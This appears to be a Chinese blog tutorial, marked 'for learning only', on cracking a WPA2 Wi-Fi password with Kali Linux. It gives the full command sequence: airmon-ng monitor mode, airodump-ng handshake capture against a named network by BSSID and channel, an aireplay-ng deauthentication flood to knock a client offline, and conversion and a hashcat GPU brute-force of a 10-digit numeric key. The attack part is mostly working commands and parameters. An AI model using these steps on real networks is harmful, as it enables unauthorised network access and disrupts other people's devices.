赞
踩
假日无事,某网站购入TL-WN722N Kali免驱网卡,扫描一下附近网络试试
仅学习使用
用Parallels Desktop 安装Kali Linux,并且接入无线网卡
airmon-ng
airmon-ng start wlan0
使用iwconfig
确认已经开启网卡监听模式,主要表现是,网卡名称wlan0变为wlan0mon, Mode:Monitor
airodump-ng wlan0mon
BSSID -- Wi-Fi的Mac地址
PWR -- 信号强度
Data -- 监听期间流量总和
CH -- WI-FI所用信道
ENC -- 加密算法
ESSID -- Wi-Fi名称
ChinaNet-zLAp
BSSID : 8C:53:C3:DA:77:F7 CH : 6
airodump-ng --bssid 8C:53:C3:DA:77:F7 -c 6 -w /root/ChinaNet-zLAp wlan0mon
# -bssid 指定要破解的WI-FI BSSID 值
# -c 指定要破解的Wi-Fi的信道
# -w 捕获到的握手包文件名
上一步中我们是被动等待
(以前我没有kali linux以及网卡的时候,MacBook就一直挂着等待很久很久~~)
但对于上面已经连上Wi-Fi的设备,我们可以使用aireplay-ng
进行deauth洪水攻击
使其设备掉线,掉线的设备会自动重新连上Wi-Fi,此时我们就可以获得握手包
保持上步抓包命令不中断,新开一个窗口执行(我们选取信号最好的 PWR = -12 ):
aireplay-ng -0 10 -a 8C:53:C3:DA:77:F7 -c 28:6C:07:29:D9:A2 wlan0mon
# -0 表示断开设备连接
# 10 表示deauth攻击次数
# -a 为Wi-Fi的BSSID
# -c 表示让连接设备失效的设备BSSID地址,为上图中STATION地址
上图为洪水攻击过程(攻击过程十分明显,因为我连网的智能台灯熄灭重启了)
如图所示,我们已经抓到了重新认证的 28:6C:07:29:D9:A2
的握手包,使用Ctrl +C
终止抓包
此时会在指定目录下产生文件(每次抓包后会产生一组,留意数字为第几次执行的)
字典配合Aircrack-ng
效率有点低(CPU破解),所以我们使用HashCat
(GPU)破解WPA/WPA2
的握手包
由于HashCat
无法直接破解CAP
文件,所以我们得将其转化为HCCAPX
文件
去官网转换,https://hashcat.net/cap2hccapx/ 如图
或者使用工具(hashcat-utils的cap2hccapx):
下载地址:https://github.com/hashcat/hashcat-utils/releases/
cd hashcat-utils-1.9/bin && chmod +x cap2hccapx.bin
将CAP文件转化为HCCAPX文件:
hashcat -a 3 -m 2500 ChinaNet-zLAp-01.hccapx "?d?d?d?d?d?d?d?d?d?d"
# -a attack_mode [ 0 Straight(字典破解) 1 Combination(组合破解) 3 Brute-force(掩码暴力破解)]
# -m 2500 破解WPA2 hccapx文件
#'?d' 一个'?d'表示一个数字,我这里是10位数数字密码,常用掩码类型如下:
# ? | Charset
# ===+=========
# l | abcdefghijklmnopqrstuvwxyz
# u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
# d | 0123456789
# h | 0123456789abcdef
# H | 0123456789ABCDEF
# s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
# a | ?l?u?d?s
按下**’s’**了解最新破解信息(Wi-Fi是10位数数字密码,GTX 850M 最久需要两天。。)
过了很久,密码破解成功,如图:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。